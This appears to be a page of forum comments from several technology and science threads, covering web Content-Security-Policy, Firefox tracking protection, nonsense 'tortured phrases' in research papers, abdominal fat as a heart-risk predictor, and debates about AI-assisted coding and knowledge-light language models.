"An alternative: <meta http-equiv="Content-Security-Policy" content="script-src 'self' https://only-scripts-allowed-from-here.com">This makes the client only load self-hosted scripts, or scripts only from the specified origins, among the other directives CSP allows (e.g. restricting styles, images, frames, etc.): https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP"

"I have "Enhanced Tracking Protection" strict mode enabled in Firefox and surprise surprise it is allowing `static.cloudflareinsights.com` not blocking it.So much for "Firefox shields you as you browse, blocking trackers automatically so you’re in control of your digital trail" Mozilla.....Edit to add:I have been doing a little experimenting, it looks like there might be some sort of hardcoded whitelist somewhere in Firefox ?When I first wanted to check, I visited `cloudflare.com` as it seemed the obvious place to find `static.cloudflareinsights.com` and Firefox shield blocks nothing there (hence I made this post)However, then I tried to find a different site, and after a bit of random searching/clicking around I found `www.tenforums.com` and `static.cloudflareinsights.com` is blocked on there.Its not a first-party domain thing, since cloudflare.com != cloudflareinsights.com.Surely `static.cloudflareinsights.com` should be blocked everywhere in strict mode, no exceptions ?Interestingly, when testing other sites, I have also been discovering other things Firefox shield is failing to block, e.g. `browser.events.data.microsoft.com` (tested on a non microsoft.com site)"

Preview of 'Research papers using "kidney disappointment" instead of "kidney failure"'

Research papers using "kidney disappointment" instead of "kidney failure"

"Nothing beats when, in a chemistry paper, AI paraphrased „the final solution” into „the mass killing of an ethnic group”.“Subsequently, 1 mL of the mass killing of an ethnic group was opposed to 20 mL of the skin sample and unprotected to light for 7 min.”From: https://bsky.app/profile/forbetterscience.bsky.social/post/3..."

"Here is one hypothesis: https://theconversation.com/problematic-paper-screener-trawl...<quote> Have you ever heard of the Joined Together States? Or bosom peril? Kidney disappointment? Fake neural organizations? Lactose bigotry? These nonsensical, and sometimes amusing, word sequences are among thousands of “tortured phrases” that sleuths have found littered throughout reputable scientific journals.They typically result from using paraphrasing tools to evade plagiarism-detection software when stealing someone else’s text. The phrases above are real examples of bungled synonyms for the United States, breast cancer, kidney failure, artificial neural networks, and lactose intolerance, respectively. </quote>"

"Most of these are authored by what appear to be non-native English speakers. So, the most likely explanation is a translation issue.In engineering literature from Russia from the 1960s, one sometimes finds references to a ‘water goat’ in papers that are otherwise about heavy machinery. It turns out this is a twice-translated rendition of ‘hydraulic ram’."

Preview of 'Abdominal fat predicts heart disease risk better than BMI'

Abdominal fat predicts heart disease risk better than BMI

"Relatedly, there is evidence that certain types of "resistant starch" can help reduce visceral fat. This starch comes from green bananas, potatoes, legumes, etc. It has to be either raw (there are supplements for this) or cooked and cooled."Resistant starch intake facilitates weight loss in humans by reshaping the gut microbiota"https://pmc.ncbi.nlm.nih.gov/articles/PMC10963277/Edit: Ah, HN submission 2 years ago: https://news.ycombinator.com/item?id=39592367"

"For non-invasive heart disease risk prediction nothing beat ECG, period.Somehow American Heart Association and its European counterpart are in denial, and still pushing dinasour screening mechanism with very low accuracy for heart disease risk prediction.The standard risk model for CVD based on PREVENT (US) and SCORE-2 (Europe) like parameters are very poor as reported in the recently published paper on the their accuracy performance by the Swedish team [1]. As all CVD risk stratification with cardiologist review (expert-in-the-loop), the most important accuracy metric is sensivity/recall (avoiding false negative that will escape review) of PREVENT and SCORE-2, 26% and 48%, respectively.The paper alternative proposal increased the sensitivity to 58% by performing clustering instead of conventional regression models as practiced in the PREVENT and SCORE-2.These type of models including the latest proposal performed very poorly as indicated by their otherwise excellent and intuitive display of graphical abstract results [1].[1] Risk stratification for cardiovascular disease: a comparative analysis of cluster analysis and traditional prediction models:https://academic.oup.com/eurjpc/advance-article/doi/10.1093/..."

"I thought this was pretty well known already. Being “overfat” is the problem, not being overweight (though they’re often correlated). BMI is really easy to measure, and is mostly accurate, that’s why it’s so pervasive. However it remains a pretty rudimentary metric (and really should use the third power or your height instead of the second)."

Preview of 'Working with AI feels more like leadership than coding'

Working with AI feels more like leadership than coding

"The word is "management", not "leadership". This comes across as a LinkedIn post filled with vague notions and weak writing.The conclusion also completely contradicts a previous point, which is that managing an LLM is not like managing a human. So the skills are, in contradiction to that LLM-ism of a conclusion, new. The author isn't using their people management skills, they're using new LLM-management skills. They think the two are similar, but didn't bother breaking down how they're the same vs where they contrast. It's just a lazy observation expanded out to a short essay that says nothing interesting."

"My Eng lead has no coding experience, 25 years of management experience, yet has driven 3 separate projects into technical bankruptcy to date.He just accepts anything that Claude says as truth. He vibecoded over 60,000 lines of code in 3 weeks, but couldn’t get it to do what he want and made a project overrun for 3 extra months. When the pissed off stakeholders called a meeting to ask what was going on he didn’t show up and sent his junior engineer to answer questions and take the blame. Now thats leadership."

"The task is very simple: Thousands of super fast fairly good contractors show up at your company's front door. You can't really trust them with data, they do occasionally make mistakes, they have to learn everything about your organization and product from scratch, and btw they leave in 10 minutes again.If you can design your organization to handle this, you gain superpowers. And of course this is a management problem rather than coding exercise."

Preview of 'Models Are Getting Dumber on Purpose'

Models Are Getting Dumber on Purpose

"Ideally what I'd like to see is pluggable knowledge bases.So if I'm e.g. coding a SwiftUI app for navigation, I'd take 9B of basic coding and reasoning, add 10B of swift/swiftUI, add 5B of GIS/geography knowledge and another 5B of frontend app design knowledge. My model doesn't need to know a single line of python.Then when I want to research electronics components, I grab a 15B model of agentic research techniques, and add in 10B of electronics knowledge, etc.I don't want general purpose models. They try to be everything to everyone. I want to click together a model that is laser-focused on what I am doing, and I want to run it locally"

"This AI generated post (100% on Pangram) is pretty out of date.>On SimpleQA, a benchmark of factual recall with no tools allowed, the current leader is Gemini 2.5 Pro at 53%, so the best recall money can buy still misses half the questions.SimpleQA hasn't been updated in a long time. Gemini 2.5 Pro is a sixteen-month-old model, not "the best recall money can buy".>The part I find most promising is what this does to hallucination. When a fact lives in weights, a wrong fact is unfindable and unfixable.This seems confused. LLM hallucinations don't come from the weights containing "wrong facts", they are artifacts that appear at runtime.>When the fact lives outside the model, a wrong answer has an address. The model cites a document, so you can open the document. If the document is wrong, you edit the documentYou can make any modern LLM explain its reasoning and find sources for its claims. None of this has anything to do with facts needing to exist in weights or in harnesses.The internet is full of wrong information and I cannot magically edit it to make it all correct, so this doesn't help me.>if a model is factually wrong a claim with a source is checkable and a claim from weights isn't.Why? If a model's weights claim that Bart Simpson became President in 2020, why does this fact suddenly become uncheckable?"

"Great article, even if it will be interesting to see whether things continue to develop in such a direction or not.> There's a version of this future where the model card stops listing a knowledge cutoff at all, because what's left in the weights goes stale on a scale of years instead of weeks.Future?Even just recently I’ve read of two approaches to this problem:Cactus have come up with Needle [0][1], which is their tool-calling focused 14 MB model (still an LLM!) – no world knowledge engrained.And instead of say, tool call structure, VibeThinker [2][3] focuses on reasoning over world knowledge.Combine these two approaches with a reliable search tool/a safe way of accessing the internet for the model, and you’ve got a probably slightly slower model for factual questions, which on the upside however doesn’t hallucinate.[0] https://cactuscompute.com/needle[1] https://news.ycombinator.com/item?id=49246804[2] https://arxiv.org/abs/2606.16140[3] https://news.ycombinator.com/item?id=48639240"

Preview of 'Software Engineering fundamentals matter more'

Software Engineering fundamentals matter more

"AI generated code is like IKEA furniture.IKEA furniture embodies many elements of good cabinet making but skips many nonessential elements. And does this more consistently than cabinet makers who can be bored, incompetent, depressed, burnt out, resentful, tired, having a bad day.In the future AI code inevitably will embody most good software engineering practices. And will do this more consistently than software engineers who can be bored, incompetent, depressed, burnt out, resentful, tired, having a bad day.Just look at the messages on HN or around you at your colleagues to see how mediocre the average software engineer is..Today's IKEA is good enough for most people.Tomorrow's AI coding will be good enough for most corporations.Good enough to vastly reduce the need for fine craftsmen and women / software engineers.Good enough to deskill those who call themselves cabinet makers / senior software engineers. These days the cabinet makers I personally know just do contract kitchens for project builders.But IKEA is and AI will be, bad enough that at the high end with special requirements / taste / money / an inflated sense of self worth, some furniture makers still exist and thrive.Perhaps 1% percent of current software engineers of today will be needed in the future when AI code inevitably has the ability to follow good software engineering practice.......And as usual it will mainly be the mediocrities that remain ( so there is hope for you too ), with occasional islands of excellence."

"> Making software debuggable, maintainable, layered, and composable – that’s still quite a trick. Quite a lot of that work requires extensive, thoughtful reasoning. And that’s where the LLM’s today, even the leading edge of the “capability” from frontier models, fall short.It’s been my quest during my career to figure out what is maintainable software, what is composable or not, and how the two things, and many other things, are in direct conflict. There is no single answer. If your goal is to take over the market quick, as many here would like, maintainability is a very low priority aspect of your code base. Composability may matter for integrators but can be entirely ignored in your CRUD backend. Beyond that, I don’t know of a good way to measure most of these intangible properties. Highly competent software developers disagree in even basic things, like whether OOP is a good idea, should we all be using pure functional programming etc. Hence, how would you expect an LLM to get good at figuring this out for you? If you describe exactly what trade offs you are willing to make, and give it ways to measure how well it’s doing, then I do think LLMs will be able to not fall short. Given the current state of things, it’s just a matter of opinion whether LLMs fall short, or humans fall short for that matter."

"With generated code, the directory structure, interface design and general state management is usually a haphazard mess. Even with the best frontier models. But what really gets me is the model often tries to make assumptions for me that I didn't specify in the prompt. Subtle things like which error states are "oh shit we need to bail" vs "this isn't a deal breaker." Sometimes it will ask, but more often than not it will just make a decision and it's often the wrong one. If I don't have a fully kitted out test suit and a good type checker to verify the final product against, the the whole looping thing is just useless to me and I'm back to reviewing every line of code it puts out and having to draw on my years of architecture experience to make sure we don't build a giant pile of trash."

Fork me on GitHub